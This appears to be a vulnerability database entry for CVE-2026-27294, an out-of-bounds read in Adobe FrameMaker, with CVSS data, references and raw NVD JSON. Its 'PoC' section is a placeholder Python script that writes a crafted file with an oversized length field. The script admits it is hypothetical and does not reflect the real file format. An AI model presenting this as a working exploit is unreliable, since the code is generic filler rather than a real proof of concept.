CVE-2026-27294

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe Framemaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# Generate a malicious file to trigger Out-of-Bounds Read
# This is a conceptual PoC. The specific file format structure of Framemaker is required for precision.

def create_malicious_file(filename):
    with open(filename, 'wb') as f:
        # Write a generic header (hypothetical)
        f.write(b'MALICIOUS_HEADER')
        
        # Write a crafted size field that triggers the overflow
        # Assuming the parser reads a 4-byte integer for buffer size
        # We set a large value to force reading past the buffer
        evil_size = 0xFFFFFFFF
        f.write(struct.pack('<I', evil_size))
        
        # Fill the rest with junk data
        f.write(b'A' * 1000)

if __name__ == "__main__":
    create_malicious_file('exploit.fm')
    print("Malicious file generated: exploit.fm")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27294
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27294
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27294/
[4] VulDB https://vuldb.com/cve/CVE-2026-27294
[5] https://helpx.adobe.com/security/products/framemaker/apsb26-36.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27294", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:26.303", "lastModified": "2026-04-15T18:14:55.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}